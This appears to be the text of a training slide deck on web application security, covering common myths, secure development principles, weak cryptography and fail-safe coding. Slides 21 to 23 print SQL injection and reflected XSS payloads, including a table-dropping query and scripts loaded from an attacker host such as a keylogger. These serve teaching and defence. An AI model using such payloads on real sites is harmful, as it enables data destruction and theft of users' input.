The document discusses the critical need for web application security, highlighting that 90% of companies experienced hacking incidents last year. It debunks common myths about security measures, focuses on secure development principles, and addresses vulnerabilities like SQL injection and cross-site scripting. The document emphasizes the importance of employing strong encryption, minimizing attack surfaces, and following best practices to ensure secure software development.

1. “
The only truly secure system is one that is powered
off, cast in a block of concrete and sealed in a
lead-lined room with armed guards
”
- Gene Spafford

2. A BIRD'S EYE VIEW
of
SECURING WEB APPLICATIONS

3. Hello Everyone

4. Imran Mohammed
# Security Researcher
# Null Hyd Moderator
# OWASP Hyd Board Member
@imran_naseem

5. Do you know ?

6. 90% of companies
got hacked last year
http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey

7. To name few ...

8. 60% got hacked twice

9. 50% are unsure about this year

10. Myths of App Sec

11. Myth #1
We have network firewall & WAF

12. Myth #2
We have SSL hence we are secure

13. Myth #3
Testing team will handle security

14. Myth #4
Nobody will attack us, we are a small
organization

16. “
If you think technology can solve your security problems,
then you don't understand the problems and you don't
understand the technology
”
- Bruce Schneier

18. Ten commandments of secure
development

19. Input is evil, validate it
Validate input source, context, syntax and semantics of
data, current and previous states

20. SQL Injection
Front-end:
https://bookstore.com/index.php?authorname=James
Back-end:
SELECT title,year FROM books WHERE author = ‘James’

21. SQL Injection
Front-end:
https://bookstore.com/index.php?authorname=James’; drop table books;––
Back-end:
SELECT title,year FROM books WHERE author = 'James’; drop table books;–– '

22. Cross Site Scripting
Functionality:
https://example.com/error.php?message=Sorry%2c+an +error+occurred
“Reflected” back to the client via webserver:
<p>Sorry, an error occurred.</p>
Any Problem ?
https://example.com/error.php?message=[can i change this ?]

23. Cross Site Scripting
Attack Users:
https://example.com/error.php?message=
<script src=”attacker.com/malicious.js”></script>
“Reflected” back to the client via webserver:
<p><script src=”attacker.com/malicious.js”></script>.</p>
More problems
https://example.com/error.php?message=
<script src=”attacker.com/keylogger.js”></script>
https://example.com/error.php?message=
<script>document.location.href=”badsite.com”</script>

24. Check this
POST /books/user1/search.asp HTTP/1.1
Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg,
application/xshockwaveflash, application/vnd.msexcel,
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
is
Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d he ck th
C
Host: www.example.com
th is
q=sqli C heck
hidden_field=20
is
he ck th
C

25. Use cryptographically strong
algorithms

26. Base 64 is not encryption
Cookie: lang=english; sessionid=aW1yYW4=
Cookie: lang=english; sessionid=cmFnaHU=

27. MD5 is not good enough
http://www.example.com/salary/view/8635f8ebae3017a5581dbeba
572eb01a
Google it

28. Use SHA2 or better with salt

29. Minimize attack surface

30. Use Least privilege

31. Keep security simple
Keep design as simple and small as possible. Complex design is
difficult to understand and secure.

32. Provide Defense in depth

36. Fail safely
isAdmin = true;
try {
codeWhichMayFail();
isAdmin = isUserInRole( “Administrator” );
}
catch (Exception ex) {
log.write(ex.toString());
}

37. Avoid Security through
obscurity

38. Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC
Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC

39. Fix Security issues correctly

40. Use Secure defaults
Remember scott/tiger ?
and
Admin/password ( router's admin panel )

41. Dont reinvent the wheeel

42. How to do develop/fix the code
securely ?

43. Follow Secure SDLC

44. OWASP Development Guide

45. Educate Developers/Users

46. Use OWASP ESAPI

48. Typical OWASP ESAPI Example

49. Thanks !

50. Questions ?

51. Credits
All icons are taken from the noun project
OWASP Project related Images are taken from owasp.org